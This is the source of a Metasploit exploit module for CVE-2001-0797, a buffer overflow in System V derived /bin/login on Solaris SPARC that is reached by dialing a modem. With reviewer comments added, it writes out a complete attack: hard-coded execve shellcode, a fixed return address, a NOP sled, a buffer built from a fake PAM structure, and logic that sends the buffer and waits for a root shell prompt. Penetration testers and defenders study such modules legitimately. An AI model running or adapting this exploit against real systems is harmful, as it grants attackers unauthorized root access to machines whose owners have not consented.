Path: blob/master/modules/exploits/dialup/multi/login/manyargs.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Dialup module for CVE-2001-0797 (System V derived /bin/login, extraneous
# arguments buffer overflow). It dials the target's modem, waits for a login
# prompt, submits the single oversized login line assembled by #buildbuf, and
# then treats a password prompt followed by a '# ' prompt as success.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # The connect_dialup / dialup_expect / dialup_puts / disconnect_dialup
  # helpers used below are not defined in this file; they are expected to
  # come from this mixin.
  include Msf::Exploit::Remote::Dialup

  # Registers module metadata with the framework.
  #
  # There is exactly one target, carrying a hard-coded return address ('Ret'),
  # a fixed SPARC shellcode string and a 4-byte NOP; #buildbuf reads all three
  # through self.target.
  #
  # NOTE(review): #buildbuf never references `payload`, so the 'Payload'
  # block (Space/BadChars/DisableNops) does not appear to influence what is
  # sent -- the target's own 'Shellcode' string is used instead.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'System V Derived /bin/login Extraneous Arguments Buffer Overflow',
      'Description'    => %q{
          This exploit connects to a system's modem over dialup and exploits
          a buffer overflow vulnerability in it's System V derived /bin/login.
          The vulnerability is triggered by providing a large number of arguments.
      },
      'References'     =>
        [
          [ 'CVE', '2001-0797'],
          [ 'OSVDB', '690'],
          [ 'OSVDB', '691'],
          [ 'BID', '3681'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2002-10/0014.html'],
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-12/0404.html'],
        ],
      'Author'         =>
        [
          'I)ruid',
        ],
      'Arch'           => ARCH_TTY,
      'Platform'       => ['unix'],
      'License'        => MSF_LICENSE,
      'Payload'        =>
        {
          'Space'    => 3000,
          'BadChars' => '',
          'DisableNops' => true,
        },
      'Targets'        =>
        [
          [ 'Solaris 2.6 - 8 (SPARC)',
            {
              'Platform' => 'unix',
              # Fixed return address for this single target; written twice
              # into the buffer by #buildbuf as a 32-bit big-endian value.
              'Ret' => 0x00027184,
              # Solaris/SPARC special shellcode (courtesy of inode)
              # execve() + exit()
              'Shellcode' =>
                "\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc" +
                "\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4" +
                "\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14" +
                "\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08",
              # 4-byte NOP; #buildbuf repeats it 398 times ahead of the shellcode.
              'NOP' => "\x90\x1b\x80\x0e",
            }
          ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => '2001-12-12'))

    # No options are registered: the USER option is commented out, so the
    # datastore['USER'] read in #buildbuf has no declaration here.
    register_options(
      [
        # OptString.new('USER', [true, 'User to log in as', 'bin']),
      ])
  end

  # Assembles the single line sent in reply to the login prompt.
  #
  # Layout, in order: the login name 'bin', the target return address, sixty
  # one-letter arguments ('a '), padding, a NOP sled followed by the target
  # shellcode, more padding, and a fake pam_handle_t region terminated by a
  # newline. Returns the assembled String; nothing is sent from here.
  #
  # From a detection standpoint, the distinctive shape on the wire is a login
  # name followed by dozens of one-character arguments on one line -- the
  # "large number of arguments" trigger named in the module description.
  def buildbuf
    print_status("Targeting: #{self.target.name}")

    retaddr = self.target.ret
    shellcode = self.target['Shellcode']
    nop = self.target['NOP']

    # NOTE(review): both locals are assigned but never read in this method.
    user = datastore['USER']
    command = datastore['COMMAND'] + "\n"

    # prepare the evil buffer
    # i is the running write offset; every write below uses buf[i, len] = ...
    # and then advances i by the same length.
    i = 0
    buf = ''

    # login name
    buf[i,4] = 'bin '
    i += 4

    # return address (32-bit big-endian)
    buf[i,4] = [retaddr].pack('N')
    i += 4
    buf[i,1] = ' '
    i += 1

    # trigger the overflow: 60 space-separated one-letter arguments
    (0...60).each {|c|
      buf[i,2] = 'a '
      i += 2
    }

    # padding
    buf[i,4] = ' BBB'
    i += 4

    # nop sled and shellcode
    (0...398).each {|c|
      buf[i,nop.size] = nop
      i += nop.size
    }
    # NOTE(review): the case subject is the string literal 'c', not the
    # variable c, so neither when-branch can ever match; every shellcode byte
    # is appended verbatim by the else branch and the two escaping branches
    # are dead code.
    shellcode.each_byte {|b|
      c = b.chr
      case 'c'
      when "\\"
        buf[i,2] = "\\\\"
        i += 2
      when "\xff", "\n", " ", "\t"
        buf[i,1] = "\\"
        buf[i+1,1] = (((b & 0300) >> 6) + '0').chr
        buf[i+2,1] = (((b & 0070) >> 3) + '0').chr
        buf[i+3,1] = ( (b & 0007) + '0').chr
        i += 4
      else
        buf[i,1] = c
        i += 1
      end
    }
    # TODO: need to overwrite/skip the last byte of shellcode?
    #i -= 1

    # padding
    buf[i,4] = 'BBB '
    i += 4

    # pam_handle_t: minimal header
    # 16 filler bytes, the return address again, then a 32-bit big-endian 1.
    buf[i,16] = 'CCCCCCCCCCCCCCCC'
    i += 16
    buf[i,4] = [retaddr].pack('N')
    i += 4
    buf[i,4] = [0x01].pack('N')
    i += 4

    # pam_handle_t: NULL padding (52 zeroed 32-bit words)
    (0...52).each {|c|
      buf[i,4] = [0].pack('N')
      i += 4
    }

    # pam_handle_t: pameptr must be the 65th ptr
    # The trailing "\n" terminates the login line.
    buf[i,9] = "\x00\x00\x00 AAAA\n"
    i += 9

    return buf
  end

  # Drives the session: dial, wait for the login prompt, send the buffer in
  # 256-byte chunks with a 0.5 s pause between chunks, then wait for a
  # password prompt and a '# ' prompt before invoking the handler.
  #
  # A failed dial prints an error and returns without disconnecting; every
  # later failure path disconnects and returns. Nothing here raises on its
  # own.
  def exploit
    buf = buildbuf

    print_status("Dialing Target")
    if not connect_dialup
      print_error("Exiting.")
      return
    end

    print_status("Waiting for login prompt")

    # 10 second wait for anything ending in "ogin:" plus whitespace.
    res = dialup_expect(/ogin:\s/i, 10)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Login prompt not found... Exiting.")
      disconnect_dialup
      return
    end

    # send the evil buffer, 256 chars at a time
    print_status("Sending evil buffer...")
    #puts Rex::Text.to_hex_dump(buf)
    len = buf.length
    p = 0
    while(len > 0) do
      # chunk size: at most 0x100 (256) bytes, or whatever remains
      i = len > 0x100 ? 0x100 : len
      #puts Rex::Text.to_hex_dump(buf[p,i])
      dialup_puts(buf[p,i])
      len -= i
      p += i
      # if len > 0
      #   puts Rex::Text.to_hex_dump("\x04")
      #   dialup_puts("\x04") if len > 0
      # end
      # Kernel#select with no IO sets: a 0.5 second pause between chunks.
      select(nil,nil,nil,0.5)
    end

    # wait for password prompt
    print_status("Waiting for password prompt")
    res = dialup_expect(/assword:/i, 30)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Target is likely not vulnerable... Exiting.")
      disconnect_dialup
      return
    end

    print_status("Password prompt received, waiting for shell")
    # A fixed placeholder is sent as the password; the shell-prompt check
    # below is what decides success.
    dialup_puts("pass\n")

    # A "#" followed by whitespace is taken as the shell prompt.
    res = dialup_expect(/#\s/i, 20)
    #puts Rex::Text.to_hex_dump(res[:buffer])
    if not res[:match]
      print_error("Shell not found.")
      print_error("Target is likely not vulnerable... Exiting.")
      disconnect_dialup
      return
    end

    print_status("Success!!!")
    # Presumably hands the open session to the framework's handler -- confirm
    # against the Dialup mixin.
    handler

    disconnect_dialup
  end
end